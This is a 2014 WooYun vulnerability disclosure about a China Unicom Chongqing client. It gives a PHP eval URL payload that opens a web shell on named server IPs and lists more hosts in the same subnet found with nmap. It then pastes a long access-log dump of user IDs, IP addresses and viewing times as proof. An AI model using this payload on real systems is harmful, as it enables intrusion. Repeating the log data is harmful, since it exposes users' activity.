当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071710

漏洞标题:重庆联通客户端某处命令执行引发的大问题

相关厂商:重庆联通

漏洞作者: scanf

提交时间:2014-08-09 15:20

修复时间:2014-09-23 15:22

公开时间:2014-09-23 15:22

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-09: 细节已通知厂商并且等待厂商处理中
2014-08-14: 厂商已经确认,细节仅向厂商公开
2014-08-24: 细节向核心白帽子及相关领域专家公开
2014-09-03: 细节向普通白帽子公开
2014-09-13: 细节向实习白帽子公开
2014-09-23: 细节向公众公开

简要描述:

重庆联通客户端真是方便啊,又能续费又能看电影,还能玩游戏.

详细说明:

先下载

QQ截图20140809150618.png


QQ截图20140809150701.png


然后安装打开什么的

QQ截图20140809130524.png


右键出ip

QQ截图20140809130751.png


QQ截图20140809130853.png


http://58.17.163.99//abc/abc/abc/$%7B@print(eval($_POST[c]))%7D


就getshell了

QQ截图20140809131032.png


然后搜索出第二个ip

QQ截图20140809131142.png


QQ截图20140809131244.png


http://58.17.163.124//abc/abc/abc/$%7B@print(eval($_POST[c]))%7D


QQ截图20140809131338.png


然后看着是同一c段的
会不会还存在有相同配置的服务器呢?
于是上nmap
发现相同的不少
http://58.17.163.101/
http://58.17.163.102/
http://58.17.163.106/
http://58.17.163.111/

漏洞证明:

QQ截图20140809125625.png


今天的访问记录

{"uid":"e9e56af5262fae57f50ad361c3464a28","mid":"363921","vid":"","type":"videoview","ctime":"1407513493","ip":"113.205.129.196"}
{"uid":"359797396e56429d951d772a4ce2aea5","mid":"367670","vid":"","type":"videoview","ctime":"1407513588","ip":"123.145.120.197"}
{"uid":"e9e56af5262fae57f50ad361c3464a28","mid":"369480","vid":"","type":"videoview","ctime":"1407513648","ip":"113.205.129.196"}
{"uid":"a16b74d4ae7d866f61170b4384b8ee17","mid":"359366","vid":"","type":"videoview","ctime":"1407513718","ip":"119.4.180.186"}
{"uid":"ca59654763091eb900d8d71b35b165ac","mid":"355299","vid":"","type":"videoview","ctime":"1407513725","ip":"113.205.58.169"}
{"uid":"a16b74d4ae7d866f61170b4384b8ee17","mid":"360123","vid":"","type":"videoview","ctime":"1407514149","ip":"119.4.180.186"}
{"uid":"086d07a8e10637a3509fa961c8717ac0","mid":"366488","vid":"","type":"videoview","ctime":"1407514109","ip":"27.13.61.194"}
{"uid":"086d07a8e10637a3509fa961c8717ac0","mid":"366488","vid":"","type":"videoview","ctime":"1407514166","ip":"27.13.61.194"}
{"uid":"145a457b3871d10ee72d426c64b88bf9","mid":"368529","vid":"","type":"videoview","ctime":"1407514371","ip":"123.145.177.1"}
{"uid":"807b75da5353e987ff016e32f95def98","mid":"369742","vid":"","type":"videoview","ctime":"1407514306","ip":"27.8.131.195"}
{"uid":"9a4d37b7727da6b2dd1a3e8f5b75fad0","mid":"12457","vid":"","type":"videoview","ctime":"1407514665","ip":"119.4.161.88"}
{"uid":"4bcdca664edcd7f58af71e99dbf70095","mid":"90302","vid":"","type":"videoview","ctime":"1407514676","ip":"112.192.151.210"}
{"uid":"4bcdca664edcd7f58af71e99dbf70095","mid":"359798","vid":"","type":"videoview","ctime":"1407514731","ip":"112.192.151.210"}
{"uid":"fbbed12d9e3d59c7693ba78ac9890c8a","mid":"1049","vid":"","type":"videoview","ctime":"1407514954","ip":"119.4.220.92"}
{"uid":"981e9cefe7caf86dfd628c6b2ef34232","mid":"367670","vid":"","type":"videoview","ctime":"1407515045","ip":"27.10.13.108"}
{"uid":"cb2fe7bf425878c89a9574ae3ed492cf","mid":"121939","vid":"","type":"videoview","ctime":"1407515101","ip":"61.135.190.199"}
{"uid":"38393fd1c2c0c104d73fd96f8fbda5a4","mid":"6030","vid":"","type":"videoview","ctime":"1407515177","ip":"61.135.190.71"}
{"uid":"fbbed12d9e3d59c7693ba78ac9890c8a","mid":"5475","vid":"","type":"videoview","ctime":"1407515335","ip":"119.4.220.92"}
{"uid":"041f052417bd32e7da1177b295b63b2d","mid":"369850","vid":"","type":"videoview","ctime":"1407515450","ip":"123.145.31.18"}
{"uid":"fbbed12d9e3d59c7693ba78ac9890c8a","mid":"17330","vid":"","type":"videoview","ctime":"1407515839","ip":"119.4.220.92"}
{"uid":"253c89584a388c7c5766117a128c60bd","mid":"369966","vid":"","type":"videoview","ctime":"1407516096","ip":"112.192.78.247"}
{"uid":"3ce9fcc418620f0ef1b3dc52e8aec932","mid":"7384","vid":"","type":"videoview","ctime":"1407516212","ip":"27.13.19.208"}
{"uid":"3ce9fcc418620f0ef1b3dc52e8aec932","mid":"99863","vid":"","type":"videoview","ctime":"1407516315","ip":"27.13.19.208"}
{"uid":"3ce9fcc418620f0ef1b3dc52e8aec932","mid":"57924","vid":"","type":"videoview","ctime":"1407516338","ip":"27.13.19.208"}
{"uid":"4bcdca664edcd7f58af71e99dbf70095","mid":"359798","vid":"","type":"videoview","ctime":"1407516438","ip":"112.192.151.210"}
{"uid":"4843cd9e648f5b02c599b30ad9a14b6a","mid":"124011","vid":"","type":"videoview","ctime":"1407516463","ip":"61.135.190.69"}
{"uid":"57d93d6fc6a9305590e5145d5cdada8a","mid":"2197","vid":"","type":"videoview","ctime":"1407516588","ip":"27.14.11.77"}
{"uid":"618efe1252729a3be8aa8d4a98c38825","mid":"357455","vid":"","type":"videoview","ctime":"1407516898","ip":"27.13.52.146"}
{"uid":"57d93d6fc6a9305590e5145d5cdada8a","mid":"2197","vid":"","type":"videoview","ctime":"1407516967","ip":"27.14.11.77"}
{"uid":"9d1a2459330f6c6cd9156b3231c1f3d9","mid":"365308","vid":"","type":"videoview","ctime":"1407517040","ip":"61.135.190.68"}
{"uid":"eca71005d042a9a78012f0a1cbbe1305","mid":"368766","vid":"","type":"videoview","ctime":"1407517192","ip":"220.181.51.142"}
{"uid":"d40f4c29f2293e5eda94fce233c5c908","mid":"368766","vid":"","type":"videoview","ctime":"1407517236","ip":"220.181.165.68"}
{"uid":"543694c92b1e31c0e4bac1940ef527c3","mid":"364973","vid":"","type":"videoview","ctime":"1407517743","ip":"221.10.34.188"}
{"uid":"54929780d5af0297f63c3ac79d78c463","mid":"35817","vid":"","type":"videoview","ctime":"1407517768","ip":"112.194.59.118"}
{"uid":"0539a96aaa166ba4533d8d23b92668af","mid":"181747","vid":"","type":"videoview","ctime":"1407517814","ip":"61.135.190.200"}
{"uid":"4fb927f86959621b25eed1d87ed8b23a","mid":"369850","vid":"","type":"videoview","ctime":"1407518604","ip":"112.192.86.48"}
{"uid":"e5ade0fe255d4d9be7877e27f85ea29e","mid":"363541","vid":"","type":"videoview","ctime":"1407518583","ip":"61.135.190.200"}
{"uid":"4fb927f86959621b25eed1d87ed8b23a","mid":"105905","vid":"","type":"videoview","ctime":"1407518733","ip":"112.192.86.48"}
{"uid":"173503dc7b73019c9e8aa58d09d43d30","mid":"113305","vid":"","type":"videoview","ctime":"1407519201","ip":"113.205.160.234"}
{"uid":"28d2aa02181e682e27072ebf5bdab1d1","mid":"368529","vid":"","type":"videoview","ctime":"1407519218","ip":"27.9.195.182"}
{"uid":"28d2aa02181e682e27072ebf5bdab1d1","mid":"116392","vid":"","type":"videoview","ctime":"1407519236","ip":"27.9.195.182"}
{"uid":"f9c2c547803a86d5fedd15ecaff0e96f","mid":"360017","vid":"","type":"videoview","ctime":"1407519677","ip":"220.181.165.200"}
{"uid":"0b323d116f6acf65914cc5f3ce3f7a82","mid":"308","vid":"","type":"videoview","ctime":"1407519968","ip":"27.14.25.133"}
{"uid":"8420c0e7765a980730eb8d0de78b1d5d","mid":"367535","vid":"","type":"videoview","ctime":"1407520732","ip":"27.10.49.11"}
{"uid":"24d9d50bfbc87f8f2bca20169bdeefcb","mid":"6645","vid":"","type":"videoview","ctime":"1407521286","ip":"111.206.36.146"}
{"uid":"6a3abbf071ff87cf6edf73b4d47140aa","mid":"369252","vid":"","type":"videoview","ctime":"1407522222","ip":"111.206.36.145"}
{"uid":"1c58acfda782d73fb77fb41957bd6154","mid":"367513","vid":"","type":"videoview","ctime":"1407522394","ip":"112.192.145.66"}
{"uid":"1c58acfda782d73fb77fb41957bd6154","mid":"366161","vid":"","type":"videoview","ctime":"1407522500","ip":"112.192.145.66"}
{"uid":"47aebfc2ed0f5853125455a7f76ba5db","mid":"369160","vid":"","type":"videoview","ctime":"1407522738","ip":"111.206.36.13"}
{"uid":"1a00ab5793bc17a7fbebc269793a0cda","mid":"337558","vid":"","type":"videoview","ctime":"1407522899","ip":"27.13.54.160"}
{"uid":"8420c0e7765a980730eb8d0de78b1d5d","mid":"367670","vid":"","type":"videoview","ctime":"1407522814","ip":"27.10.49.11"}
{"uid":"23ba8fd4a9be9424ea81c4096c856035","mid":"12419","vid":"","type":"videoview","ctime":"1407522974","ip":"124.161.162.9"}
{"uid":"7217b6827930aeec6a64d63ea97e49f8","mid":"369480","vid":"","type":"videoview","ctime":"1407523601","ip":"112.192.153.87"}
{"uid":"7f9a38ff57f2e1ade846cb4f72384dc0","mid":"274735","vid":"","type":"videoview","ctime":"1407523691","ip":"112.194.112.77"}
{"uid":"7217b6827930aeec6a64d63ea97e49f8","mid":"369478","vid":"","type":"videoview","ctime":"1407524095","ip":"112.192.153.87"}
{"uid":"1c58acfda782d73fb77fb41957bd6154","mid":"369864","vid":"","type":"videoview","ctime":"1407527761","ip":"112.192.145.66"}
{"uid":"2fdf36e25c26fa06d7c897f2140e3366","mid":"353827","vid":"","type":"videoview","ctime":"1407528613","ip":"111.206.36.4"}
{"uid":"435dce162924a4c90bc6ee70f6d6ffc3","mid":"15382","vid":"","type":"videoview","ctime":"1407528638","ip":"111.206.36.14"}
{"uid":"3a18ba4dc8b04e232cc4ed49e9f85eae","mid":"297660","vid":"","type":"videoview","ctime":"1407528799","ip":"220.181.51.141"}
{"uid":"adbd23549791d2059ab591387b07286a","mid":"174335","vid":"","type":"videoview","ctime":"1407529081","ip":"111.206.36.9"}
{"uid":"f053f54fb007cb66139dad07cc8b9453","mid":"323776","vid":"","type":"videoview","ctime":"1407529115","ip":"27.14.169.111"}
{"uid":"4727cecaf0acc280750bc5bae2e08892","mid":"363541","vid":"","type":"videoview","ctime":"1407529309","ip":"61.135.190.199"}
{"uid":"9347181dae94269c2aa9ad3f420700e0","mid":"368934","vid":"","type":"videoview","ctime":"1407529559","ip":"61.135.190.70"}
{"uid":"535446ba84572154db3073fa9ae58a5e","mid":"108933","vid":"","type":"videoview","ctime":"1407530518","ip":"111.206.36.141"}
{"uid":"ab6e0ed9df23cde024d48398a52bb52d","mid":"274735","vid":"","type":"videoview","ctime":"1407531143","ip":"220.181.51.142"}
{"uid":"f7fb5737e5af078c3064427d18b06dea","mid":"369850","vid":"","type":"videoview","ctime":"1407531320","ip":"112.192.231.64"}
{"uid":"a1aef824f87ec9612ba8a12a2d87dd92","mid":"181747","vid":"","type":"videoview","ctime":"1407531408","ip":"220.181.51.147"}
{"uid":"f7fb5737e5af078c3064427d18b06dea","mid":"10087","vid":"","type":"videoview","ctime":"1407531706","ip":"112.192.231.64"}
{"uid":"4d7e74ac0d63b8cf7866d9959be8f772","mid":"365855","vid":"","type":"videoview","ctime":"1407532110","ip":"220.181.165.7"}
{"uid":"b3711ea42c11064ec322786dd5f93416","mid":"365308","vid":"","type":"videoview","ctime":"1407532334","ip":"61.135.190.199"}
{"uid":"8cb8b8f10b57471a0bbab1b435836135","mid":"365308","vid":"","type":"videoview","ctime":"1407532334","ip":"61.135.190.201"}
{"uid":"069d60f3fbc2e55c9e6130b6d474912d","mid":"274735","vid":"","type":"videoview","ctime":"1407532336","ip":"61.135.190.69"}
{"uid":"ef63e2acf56f33c4aa0aea460edb4534","mid":"368934","vid":"","type":"videoview","ctime":"1407532345","ip":"61.135.190.68"}
{"uid":"d8478789b5a47a78b20c4745728987cb","mid":"363541","vid":"","type":"videoview","ctime":"1407532357","ip":"61.135.190.70"}
{"uid":"fc9dc574d985de3603223ddba2bafeec","mid":"181747","vid":"","type":"videoview","ctime":"1407532357","ip":"61.135.190.71"}
{"uid":"948cf6b8f0ddc20d2a4907d52e145170","mid":"121939","vid":"","type":"videoview","ctime":"1407532379","ip":"61.135.190.201"}
{"uid":"0f7c7a2d54263b24bd8fe1e8da07e29f","mid":"255042","vid":"","type":"videoview","ctime":"1407532389","ip":"61.135.190.71"}
{"uid":"02617bcc632e0cd557be7148b7bb3ce5","mid":"297660","vid":"","type":"videoview","ctime":"1407532441","ip":"220.181.51.140"}
{"uid":"f2d6450e9ab6029d1fc1ffb6a1528b7d","mid":"368766","vid":"","type":"videoview","ctime":"1407532488","ip":"220.181.51.149"}
{"uid":"de6ce349c5c261c62dfe44d8eb77793c","mid":"124011","vid":"","type":"videoview","ctime":"1407532509","ip":"220.181.51.146"}
{"uid":"593169ebe32847c5bf5b0a6cc209c40a","mid":"174312","vid":"","type":"videoview","ctime":"1407456000","ip":"203.208.60.22"}
{"uid":"1aea0fa9ff694d621102aa4ad70e0aa8","mid":"113305","vid":"","type":"videoview","ctime":"1407534119","ip":"111.206.36.145"}
{"uid":"f7fb5737e5af078c3064427d18b06dea","mid":"10215","vid":"","type":"videoview","ctime":"1407534415","ip":"112.192.231.64"}
{"uid":"f7fb5737e5af078c3064427d18b06dea","mid":"5022","vid":"","type":"videoview","ctime":"1407534609","ip":"112.192.231.64"}
{"uid":"f7fb5737e5af078c3064427d18b06dea","mid":"4423","vid":"","type":"videoview","ctime":"1407534959","ip":"112.192.231.64"}
{"uid":"a667bcd58bfb0cb946d7113d4472c390","mid":"119610","vid":"","type":"videoview","ctime":"1404864000","ip":"203.208.60.23"}
{"uid":"e54acb6f8d97ada936be0be9c32da630","mid":"274735","vid":"","type":"videoview","ctime":"1407536325","ip":"175.152.42.209"}
{"uid":"4e1a087ad5c79feb26c21012bee6c538","mid":"100704","vid":"","type":"videoview","ctime":"1399680000","ip":"66.249.69.230"}
{"uid":"ab088c5f92292db456259b7c31cf5c28","mid":"100704","vid":"","type":"videoview","ctime":"1407456000","ip":"203.208.60.23"}
{"uid":"fb39da2671f3ad94d8bba1ae3c191e3a","mid":"79825","vid":"","type":"videoview","ctime":"1399680000","ip":"66.249.69.230"}
{"uid":"3fbc00642e72c32121ac3f06318f2f16","mid":"79825","vid":"","type":"videoview","ctime":"1407456000","ip":"203.208.60.24"}
{"uid":"2bc5eea407ae67e2fd23d91810ca085d","mid":"365589","vid":"","type":"videoview","ctime":"1407537267","ip":"119.4.161.6"}
{"uid":"6d4fdcdf17a075713b793b15bc658e0f","mid":"98773","vid":"","type":"videoview","ctime":"1407537327","ip":"175.152.42.209"}
{"uid":"6d4fdcdf17a075713b793b15bc658e0f","mid":"361321","vid":"","type":"videoview","ctime":"1407537348","ip":"175.152.42.209"}
{"uid":"6d4fdcdf17a075713b793b15bc658e0f","mid":"178011","vid":"","type":"videoview","ctime":"1407537412","ip":"175.152.42.209"}
{"uid":"afb901fbbd111a1edd25debe614bade4","mid":"360616","vid":"","type":"videoview","ctime":"1407537578","ip":"27.8.156.31"}
{"uid":"8704fba217d8a9f8395e4eef9c2c50c4","mid":"364973","vid":"","type":"videoview","ctime":"1407537798","ip":"183.228.98.0"}
{"uid":"6efde8852fec6a662a5dfe97c9684ae8","mid":"103252","vid":"","type":"videoview","ctime":"1404864000","ip":"203.208.60.22"}
{"uid":"34f59b909614e28e72db9b4bb00edc7f","mid":"103252","vid":"","type":"videoview","ctime":"1407456000","ip":"203.208.60.23"}
{"uid":"fb81562fd2d366f7f6b625e1c60497db","mid":"367151","vid":"","type":"videoview","ctime":"1407538136","ip":"27.9.96.38"}
{"uid":"6313b25c79122b094fb57b32caa00218","mid":"97982","vid":"","type":"videoview","ctime":"1407538357","ip":"27.9.197.203"}
{"uid":"6db8e72a3a6c38a0041704f6418e6776","mid":"9381","vid":"","type":"videoview","ctime":"1407538561","ip":"27.10.125.134"}
{"uid":"9d71377412b49329b4e3899317c34a9f","mid":"367535","vid":"","type":"videoview","ctime":"1407538614","ip":"119.4.132.198"}
{"uid":"17fb224b8ea3312cb8f20e22d45d163e","mid":"362707","vid":"","type":"videoview","ctime":"1407538639","ip":"111.206.36.17"}
{"uid":"6813904792d25a86dcbb21cb10fe02bc","mid":"105234","vid":"","type":"videoview","ctime":"1407538022","ip":"27.9.166.71"}
{"uid":"025a678272b0ea7745e49177e837a098","mid":"361376","vid":"","type":"videoview","ctime":"1399680000","ip":"66.249.69.214"}
{"uid":"b874e388787927e0fbd655c31d0b089a","mid":"361376","vid":"","type":"videoview","ctime":"1407456000","ip":"203.208.60.24"}
{"uid":"f962c9f68a0c7e11a0841d455cbcf0b3","mid":"335811","vid":"","type":"videoview","ctime":"1407539158","ip":"27.13.7.52"}
{"uid":"877f346171b54ef70df53d8db5a0665e","mid":"116751","vid":"","type":"videoview","ctime":"1407456000","ip":"203.208.60.23"}
{"uid":"770689c807d36872272c508fbb31f85c","mid":"368384","vid":"","type":"videoview","ctime":"1407539226","ip":"27.13.88.200"}
{"uid":"15d5e7530d1b2aa6a20b4c902dc948ba","mid":"52955","vid":"","type":"videoview","ctime":"1399680000","ip":"66.249.69.230"}
{"uid":"3b2170f56a60671926fc8442ce9968cb","mid":"119893","vid":"","type":"videoview","ctime":"1407474677","ip":"27.13.165.27"}
{"uid":"cc023075201fdb023efe1b3301539510","mid":"52955","vid":"","type":"videoview","ctime":"1407456000","ip":"203.208.60.24"}
{"uid":"770689c807d36872272c508fbb31f85c","mid":"368384","vid":"","type":"videoview","ctime":"1407539681","ip":"27.13.88.200"}
{"uid":"393bcb53c8ee0582614c9c2170a1cea7","mid":"368497","vid":"","type":"videoview","ctime":"1407539770","ip":"175.152.63.186"}
{"uid":"5b414e5ff418c822ee3cd70633ea0e97","mid":"367670","vid":"","type":"videoview","ctime":"1407539791","ip":"27.8.43.194"}
{"uid":"1ee0a719f8ca0da11848456d8bd6fd23","mid":"359700","vid":"","type":"videoview","ctime":"1407539830","ip":"27.8.103.243"}
{"uid":"fa1a96be1180319f5f669738dedf6c91","mid":"106500","vid":"","type":"videoview","ctime":"1407456000","ip":"203.208.60.24"}
{"uid":"dfa83896ff614e53887db237f886172d","mid":"363541","vid":"","type":"videoview","ctime":"1407540115","ip":"220.181.165.193"}
{"uid":"89dab6c0ec56b3e468f55248a137e427","mid":"368766","vid":"","type":"videoview","ctime":"1376004244","ip":"101.204.5.114"}
{"uid":"50f0cb09d157c629b4eb274ad0a61a79","mid":"97982","vid":"","type":"videoview","ctime":"1376004351","ip":"101.204.5.114"}
{"uid":"caaff7496a8df11b765274054da80da8","mid":"362581","vid":"","type":"videoview","ctime":"1399680000","ip":"66.249.69.214"}
{"uid":"b58f53be01848e67ce633cfc5e9541fc","mid":"362581","vid":"","type":"videoview","ctime":"1407456000","ip":"203.208.60.22"}
{"uid":"6aec08ec68f49e72dd82c20436c15a9d","mid":"368385","vid":"","type":"videoview","ctime":"1407540770","ip":"111.206.36.132"}
{"uid":"2ef95e5d66523df53a179f32272cbb5f","mid":"367408","vid":"","type":"videoview","ctime":"1407541125","ip":"123.146.45.47"}
{"uid":"56be74e6c7b244dfbb1c4cad461d523a","mid":"124063","vid":"","type":"videoview","ctime":"1407541218","ip":"119.7.229.41"}
{"uid":"356fbd42c4782809537a351a88068365","mid":"365685","vid":"","type":"videoview","ctime":"1407541221","ip":"112.195.149.76"}
{"uid":"97f2b41e272f0f6d7314d48b17d8ed62","mid":"363921","vid":"","type":"videoview","ctime":"1407541258","ip":"112.192.20.244"}
{"uid":"356fbd42c4782809537a351a88068365","mid":"356513","vid":"","type":"videoview","ctime":"1407541297","ip":"112.195.149.76"}
{"uid":"ea03a307cfe0d789c17e4262e9e73714","mid":"97982","vid":"","type":"videoview","ctime":"1407541328","ip":"113.205.230.91"}
{"uid":"97f2b41e272f0f6d7314d48b17d8ed62","mid":"124136","vid":"","type":"videoview","ctime":"1407541332","ip":"112.192.20.244"}
{"uid":"b83894ba6ea0a140cfbee6c28180e7e9","mid":"368766","vid":"","type":"videoview","ctime":"1407541459","ip":"222.128.186.55"}
{"uid":"f3b28751c126fedca152af5e951794bb","mid":"368529","vid":"","type":"videoview","ctime":"1407541410","ip":"113.205.145.85"}
{"uid":"b83894ba6ea0a140cfbee6c28180e7e9","mid":"368940","vid":"","type":"videoview","ctime":"1407541498","ip":"222.128.186.55"}
{"uid":"2ef95e5d66523df53a179f32272cbb5f","mid":"367698","vid":"","type":"videoview","ctime":"1407541496","ip":"123.146.45.47"}
{"uid":"7af5f53e255ea37ed08d86560591831b","mid":"364993","vid":"","type":"videoview","ctime":"1407541634","ip":"113.205.237.54"}
{"uid":"356fbd42c4782809537a351a88068365","mid":"365685","vid":"","type":"videoview","ctime":"1407541643","ip":"112.195.149.76"}
{"uid":"50f0cb09d157c629b4eb274ad0a61a79","mid":"363541","vid":"","type":"videoview","ctime":"1376005666","ip":"101.204.5.114"}
{"uid":"478e795d6bdce1d1722b2d4d117e5ef9","mid":"363921","vid":"","type":"videoview","ctime":"1407541728","ip":"123.147.82.76"}
{"uid":"50f0cb09d157c629b4eb274ad0a61a79","mid":"357267","vid":"","type":"videoview","ctime":"1376006184","ip":"101.204.5.114"}
{"uid":"124c970809f8bd240bc804d21317e4eb","mid":"97982","vid":"","type":"videoview","ctime":"1407542295","ip":"112.195.72.207"}
{"uid":"7c04d917b0c5b0ec83577f00545ee38f","mid":"368529","vid":"","type":"videoview","ctime":"1407542498","ip":"113.205.3.58"}
{"uid":"7c04d917b0c5b0ec83577f00545ee38f","mid":"94309","vid":"","type":"videoview","ctime":"1407542521","ip":"113.205.3.58"}
{"uid":"3f189d6976f1e91e9bc67addf13b30ae","mid":"368529","vid":"","type":"videoview","ctime":"1407542546","ip":"112.195.5.116"}
{"uid":"3f189d6976f1e91e9bc67addf13b30ae","mid":"369800","vid":"","type":"videoview","ctime":"1407542724","ip":"112.195.5.116"}
{"uid":"ec94486c6f9ae272f85c0dd2d223bb25","mid":"274735","vid":"","type":"videoview","ctime":"1407543088","ip":"175.154.157.102"}
{"uid":"ec94486c6f9ae272f85c0dd2d223bb25","mid":"368497","vid":"","type":"videoview","ctime":"1407543159","ip":"175.154.157.102"}
{"uid":"58b2984454d5996cad51d11d6ff93c3d","mid":"255042","vid":"","type":"videoview","ctime":"1407543177","ip":"61.135.190.197"}
{"uid":"eb62ef2ada2b4eb2fd23e12673cfb133","mid":"297660","vid":"","type":"videoview","ctime":"1407543218","ip":"61.135.190.199"}
{"uid":"7c04d917b0c5b0ec83577f00545ee38f","mid":"358479","vid":"","type":"videoview","ctime":"1407543285","ip":"113.205.3.58"}
{"uid":"9c0af22a8300e6dceded43bf561900e9","mid":"274735","vid":"","type":"videoview","ctime":"1407543341","ip":"112.195.69.133"}
{"uid":"ec94486c6f9ae272f85c0dd2d223bb25","mid":"93993","vid":"","type":"videoview","ctime":"1407543385","ip":"175.154.157.102"}
{"uid":"80d1439e296381f8bdcc68694dc74ef8","mid":"18689","vid":"","type":"videoview","ctime":"1407543490","ip":"111.206.36.144"}
{"uid":"f839fa1ff742296aef47b5d091d30a8f","mid":"366488","vid":"","type":"videoview","ctime":"1407543645","ip":"27.14.64.237"}
{"uid":"62964c69eee7117899ece231280e3128","mid":"365589","vid":"","type":"videoview","ctime":"1407543868","ip":"124.161.88.40"}
{"uid":"bc24b53f5aed9de7a5f413ce96bba8e4","mid":"364973","vid":"","type":"videoview","ctime":"1407543885","ip":"113.206.165.130"}
{"uid":"ec94486c6f9ae272f85c0dd2d223bb25","mid":"357898","vid":"","type":"videoview","ctime":"1407543957","ip":"175.154.157.102"}
{"uid":"287b6cdeb3d1f2d2281010755bd57a53","mid":"15346","vid":"","type":"videoview","ctime":"1407544036","ip":"112.194.20.117"}
{"uid":"bd256b823a8793a20b0508347b08c1f1","mid":"364625","vid":"","type":"videoview","ctime":"1407544073","ip":"112.193.35.51"}
{"uid":"c8ad7b7007514376d885556b3996b573","mid":"369972","vid":"","type":"videoview","ctime":"1407544394","ip":"123.145.5.42"}
{"uid":"20851900baff8a32c6bc2f4df6849651","mid":"359087","vid":"","type":"videoview","ctime":"1407544582","ip":"119.4.222.14"}
{"uid":"d27cd4b2ea57753a331c09fa09df809f","mid":"363921","vid":"","type":"videoview","ctime":"1407544693","ip":"112.195.8.79"}
{"uid":"6287f7a99d3f1f6aff078b2a01691e79","mid":"120889","vid":"","type":"videoview","ctime":"1407544794","ip":"27.13.69.121"}
{"uid":"a27335407c3c7bd3902e45bec156719b","mid":"368766","vid":"","type":"videoview","ctime":"1407544788","ip":"112.195.226.55"}
{"uid":"f87a13a24eb130c392efad8af8eccb7e","mid":"369800","vid":"","type":"videoview","ctime":"1407544957","ip":"119.7.155.140"}
{"uid":"ef1568f4754c31a79f431f80ff09eed9","mid":"368766","vid":"","type":"videoview","ctime":"1407545002","ip":"112.195.2.50"}
{"uid":"991a06a2a3bc1e2d2d98b8241c285c50","mid":"366124","vid":"","type":"videoview","ctime":"1407544993","ip":"27.14.17.180"}
{"uid":"e8aaacf131fee058b2e6ef24f1a84799","mid":"365308","vid":"","type":"videoview","ctime":"1407545096","ip":"111.206.36.9"}
{"uid":"64444be6d164c67ecba33947553b827f","mid":"337558","vid":"","type":"videoview","ctime":"1407545202","ip":"27.13.55.33"}
{"uid":"d0f7a3301b7d9ed6517306f351b1b0c3","mid":"357807","vid":"","type":"videoview","ctime":"1407545331","ip":"112.193.109.80"}
{"uid":"c8ad7b7007514376d885556b3996b573","mid":"369966","vid":"","type":"videoview","ctime":"1407545249","ip":"123.145.5.42"}
{"uid":"d0f7a3301b7d9ed6517306f351b1b0c3","mid":"368529","vid":"","type":"videoview","ctime":"1407545428","ip":"112.193.109.80"}
{"uid":"af3487ce34224a0e2e00e3b6c7160c82","mid":"362202","vid":"","type":"videoview","ctime":"1407545360","ip":"27.9.171.163"}
{"uid":"d0f7a3301b7d9ed6517306f351b1b0c3","mid":"368384","vid":"","type":"videoview","ctime":"1407545534","ip":"112.193.109.80"}
{"uid":"b88e62629a5f774618ff599425bede8f","mid":"274735","vid":"","type":"videoview","ctime":"1407545433","ip":"175.152.139.67"}
{"uid":"d0f7a3301b7d9ed6517306f351b1b0c3","mid":"366488","vid":"","type":"videoview","ctime":"1407545653","ip":"112.193.109.80"}
{"uid":"4106ee0f7f57d735dfee6d16ced930f7","mid":"16293","vid":"","type":"videoview","ctime":"1407545769","ip":"112.195.1.163"}
{"uid":"9c1b13fc3eaa74fa5f49e936ab802bda","mid":"274735","vid":"","type":"videoview","ctime":"1407545559","ip":"61.135.190.199"}
{"uid":"62964c69eee7117899ece231280e3128","mid":"369936","vid":"","type":"videoview","ctime":"1407545677","ip":"124.161.88.40"}
{"uid":"33239d9d9f1fe142f6d3505e4e81337d","mid":"368766","vid":"","type":"videoview","ctime":"1407545691","ip":"61.135.190.200"}
{"uid":"f89adc7c8a1ad718af306bf256505d98","mid":"181747","vid":"","type":"videoview","ctime":"1407545839","ip":"61.135.190.72"}
{"uid":"62964c69eee7117899ece231280e3128","mid":"369480","vid":"","type":"videoview","ctime":"1407546002","ip":"124.161.88.40"}
{"uid":"54b7610247debde269c5fda75edba052","mid":"368766","vid":"","type":"videoview","ctime":"1407546023","ip":"119.7.76.3"}
{"uid":"6517bed3feccc4dd065ef974c160691d","mid":"369478","vid":"","type":"videoview","ctime":"1407546035","ip":"113.205.173.59"}
{"uid":"d403df85ffd7c700b25c844979f3f783","mid":"365589","vid":"","type":"videoview","ctime":"1407546144","ip":"175.155.254.165"}
{"uid":"6517bed3feccc4dd065ef974c160691d","mid":"362042","vid":"","type":"videoview","ctime":"1407546240","ip":"113.205.173.59"}
{"uid":"6517bed3feccc4dd065ef974c160691d","mid":"308","vid":"","type":"videoview","ctime":"1407546271","ip":"113.205.173.59"}
{"uid":"dd854cb05756a01ea30b849854c1f330","mid":"367670","vid":"","type":"videoview","ctime":"1407546358","ip":"120.83.68.246"}
{"uid":"d268250411bd876328eb2e5d7d4c5774","mid":"363921","vid":"","type":"videoview","ctime":"1407546386","ip":"27.9.118.212"}
{"uid":"6517bed3feccc4dd065ef974c160691d","mid":"92425","vid":"","type":"videoview","ctime":"1407546496","ip":"113.205.173.59"}
{"uid":"1ee0a719f8ca0da11848456d8bd6fd23","mid":"367670","vid":"","type":"videoview","ctime":"1407546505","ip":"27.8.103.243"}
{"uid":"6517bed3feccc4dd065ef974c160691d","mid":"14197","vid":"","type":"videoview","ctime":"1407546564","ip":"113.205.173.59"}
{"uid":"6517bed3feccc4dd065ef974c160691d","mid":"97637","vid":"","type":"videoview","ctime":"1407546651","ip":"113.205.173.59"}
{"uid":"c8ad7b7007514376d885556b3996b573","mid":"357565","vid":"","type":"videoview","ctime":"1407546843","ip":"123.145.5.42"}
{"uid":"c8ad7b7007514376d885556b3996b573","mid":"363819","vid":"","type":"videoview","ctime":"1407546863","ip":"123.145.5.42"}
{"uid":"8fbf575890036d051af6eaedc47732ff","mid":"369850","vid":"","type":"videoview","ctime":"1407546877","ip":"119.7.0.214"}
{"uid":"770689c807d36872272c508fbb31f85c","mid":"365308","vid":"","type":"videoview","ctime":"1407547106","ip":"27.13.88.200"}
{"uid":"770689c807d36872272c508fbb31f85c","mid":"368384","vid":"","type":"videoview","ctime":"1407547135","ip":"27.13.88.200"}
{"uid":"e86b7ac5b54bb46808e2420424d02b80","mid":"25767","vid":"","type":"videoview","ctime":"1407546748","ip":"112.192.91.69"}
